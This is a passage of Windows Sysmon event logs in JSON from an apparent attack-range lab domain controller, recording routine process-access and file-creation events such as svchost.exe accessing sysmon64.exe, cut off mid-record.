{"EventTime":"2020-08-01 08:07:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8386,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:42.100\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:42.100","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8387,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:42.100\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:42.100","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8388,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:42.100\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:42.100","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8389,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:42.100\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:42.100","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8390,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:42.100\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:42.100","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8391,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:42.100\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:42.100","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8392,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:42.100\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:42.100","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8393,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:42.100\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-22BD-5F25-0000-0010A5061100}\r\nTargetProcessId: 4364\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:42.100","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-22BD-5F25-0000-0010A5061100}","TargetProcessId":"4364","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8394,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:43.162\r\nProcessGuid: {41C8662E-22CA-5F25-0000-0010638A1100}\r\nProcessId: 4884\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1314-0\\System.Core.dll\r\nCreationUtcTime: 2020-08-01 08:07:43.162","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:43.162","ProcessGuid":"{41C8662E-22CA-5F25-0000-0010638A1100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1314-0\\System.Core.dll","CreationUtcTime":"2020-08-01 08:07:43.162","EventReceivedTime":"2020-08-01 